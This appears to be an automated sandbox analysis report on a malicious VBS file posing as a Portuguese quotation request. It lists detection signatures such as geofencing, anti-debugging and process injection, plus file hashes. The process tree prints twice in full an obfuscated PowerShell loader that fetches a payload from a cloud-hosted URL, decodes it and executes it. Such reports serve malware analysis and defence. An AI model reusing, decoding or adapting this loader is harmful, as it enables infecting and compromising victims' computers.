Analysis
-
max time kernel
135s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 14:46
Static task
static1
Behavioral task
behavioral1
Sample
Pedido de Cotação-24100004_lista comercial.vbs
Resource
win7-20240903-en
General
-
Target
Pedido de Cotação-24100004_lista comercial.vbs
-
Size
523KB
-
MD5
071b2e84cdf90885bce11e5713dab307
-
SHA1
ea48ea5b782669f05084a4a1e374ff64c8f581c0
-
SHA256
400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741
-
SHA512
a981122c9f3f2675f116c2b860e6f05016ab7be3a9cd9eee873af4f89ff7d93548cce9c020d79fa7bf191d04f664f127efadfdca5019b5ec2699498837d46664
-
SSDEEP
6144:BA/7iXwe0h73QXqs1SQl3GZF+lfd0okbN9VusXmFtzbVHcje9wYYhnQgjDHgs91+:LKhgamowdhkFuW0tXwjQg/p1+FWg
Malware Config
Signatures
-
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exemsiexec.exeflow pid process 23 2004 powershell.exe 25 2004 powershell.exe 44 1676 msiexec.exe 47 1676 msiexec.exe 49 1676 msiexec.exe 51 1676 msiexec.exe 53 1676 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe -
Processes:
powershell.exepowershell.exepid process 2004 powershell.exe 5100 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Processes:
powershell.exepowershell.exepid process 2004 powershell.exe 5100 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid process 1676 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid process 5100 powershell.exe 1676 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2808 1676 WerFault.exe msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 2004 powershell.exe 2004 powershell.exe 5100 powershell.exe 5100 powershell.exe 5100 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 5100 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2004 powershell.exe Token: SeDebugPrivilege 5100 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 5072 wrote to memory of 2004 5072 WScript.exe powershell.exe PID 5072 wrote to memory of 2004 5072 WScript.exe powershell.exe PID 5100 wrote to memory of 1676 5100 powershell.exe msiexec.exe PID 5100 wrote to memory of 1676 5100 powershell.exe msiexec.exe PID 5100 wrote to memory of 1676 5100 powershell.exe msiexec.exe PID 5100 wrote to memory of 1676 5100 powershell.exe msiexec.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1676 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 16283⤵
- Program crash
PID:2808
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1676 -ip 16761⤵PID:3740
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5cb3bb854ff414cb031c64e184fd44781
SHA1f53d30f0585d05a14f7dd82f2d0997ab44b02d62
SHA25642a5d533e9f3aa3407b26bd46789cd5b5f5eb580a51e64ced44c4e34c9c49896
SHA5129fdeb2a9b6fdd107e1ea87e646d295150fb0c8e1d1b32737cfb3fbfec9d2e595e237055676608e3474569e53b45e825b0ce28403de219cd36e48f7a3cb60e047
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
447KB
MD54fa4bfe12534bd26a9e268a1e659e510
SHA1f42014f4e7c0f11f4bb5f559c88310eb6db186a3
SHA25611afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0
SHA51234e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01